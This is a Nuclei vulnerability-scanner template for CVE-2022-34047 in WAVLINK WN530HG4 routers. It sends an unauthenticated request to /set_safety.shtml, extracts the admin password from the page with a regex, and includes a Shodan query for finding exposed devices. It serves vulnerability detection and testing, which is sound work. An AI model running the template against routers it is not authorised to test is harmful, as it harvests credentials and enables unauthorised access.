nuclei-templates/http/cves/2022/CVE-2022-34047.yaml

49 lines
1.5 KiB
YAML

id: CVE-2022-34047
info:
name: WAVLINK WN530HG4 - Improper Access Control
author: For3stCo1d
severity: high
description: |
WAVLINK WN530HG4 M30HG4.V5030.191116 is susceptible to improper access control. An attacker can obtain usernames and passwords via view-source:http://IP_ADDRESS/set_safety.shtml?r=52300 and searching for [var syspasswd] and thereby possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
reference:
- https://drive.google.com/file/d/1sTQdUc12aZvJRFeb5wp8AfPdUEkkU9Sy/view?usp=sharing
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-34047
- http://packetstormsecurity.com/files/167891/Wavlink-WN530HG4-Password-Disclosure.html
- https://nvd.nist.gov/vuln/detail/CVE-2022-34047
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2022-34047
cwe-id: CWE-668
metadata:
shodan-query: http.title:"Wi-Fi APP Login"
verified: "true"
tags: cve2022,wavlink,router,exposure,packetstorm,cve
http:
- raw:
- |
GET /set_safety.shtml?r=52300 HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'var syspasswd="'
- '<title>APP</title>'
condition: and
- type: status
status:
- 200
extractors:
- type: regex
regex:
- 'syspasswd="(.+?)"'
# Enhanced by md on 2023/02/03